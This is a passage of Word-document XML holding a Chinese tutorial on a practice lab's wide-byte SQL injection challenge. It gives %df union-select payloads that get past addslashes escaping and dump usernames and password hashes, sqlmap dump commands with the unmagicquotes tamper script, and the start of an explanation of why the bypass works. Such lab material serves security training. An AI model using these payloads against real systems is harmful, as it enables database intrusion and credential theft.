            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>进制对应的字符串，且</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>进制无需单引号，避免被转义；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 3. group_concat(column_name)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：拼接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>表的所有字段名；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 4. information_schema.columns</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>系统表，存储所有表的字段信息；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-- 5. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>预期结果：页面显示</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>表的所有字段（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>email</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>等）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="165EF133" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="heading_20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>：获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>表账号密码（最终目标）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21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7220A3" w14:paraId="16C550A1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55B6BF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sql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>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>靶场地</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>址</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">/sqli/06.php?id=-1%df' union select </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1,2,group_concat(concat(username,0x3a,password)) from users--+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-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>逐行注释：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 1. concat(username,0x3a,password)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：拼接用户名和密码，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0x3a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>进制编码（用于分隔，方便查看）；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 2. group_concat()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：拼接所有用户的账号密码，避免多行显示；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 3. from users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：从</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>表查询数据（无需单引号</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，不会被转义）；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-- 4. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>预期结果：页面显示所有用户的账号密码（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>admin:5f4dcc3b5aa765d61d8327deb882cf99</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，其中</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5f4dcc3b...</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MD5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>加密值）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30E771C0" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="heading_21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>自动化注入（快速通关）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22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7220A3" w14:paraId="4721E496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A4F97E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bash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 xml:space="preserve"># 1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>直接宽字节注入，获取当前数据库</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>sqlmap -u "http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>靶场地址</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/sqli/06.php?id=1%df%27" --current-db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# </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>注释：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>%df%27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>%df'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>编码，直接指定注入点，避免手动拼接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# </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>获取</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>iwebsec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>库的所有表</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>sqlmap -u "http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>靶场地址</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/sqli/06.php?id=1%df%27" -D iwebsec --tables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# 3. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>导出</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>表的完整数据（账号密码）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>sqlmap -u "http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>靶场地址</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/sqli/06.php?id=1%df%27" -D iwebsec -T users --dump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# 4. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>tamper</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>脚本自动处理宽字节（无需手动构造</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>%df</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>sqlmap -u "http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>靶场地址</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/sqli/06.php?i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>d=1" --tamper=unmagicquotes --dump -D iwebsec -T users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# </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>注释：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>unmagicquotes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>脚本会自动添加宽字节字符，绕过转义，简化操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6AABDF90" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="heading_22"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>三、原理剖析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="5EE38420" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="heading_23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>宽字节注入的本质</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="543EBE52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宽字节注入的核心是「利用多字节编码的解析规则，绕过转义防护」，关键在于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转义符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>被宽字节编码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>吞掉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>’”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，具体逻辑如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA4F43F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（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）正常转义逻辑：程序使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>addslashes()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>函数，将用户输入的单引号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
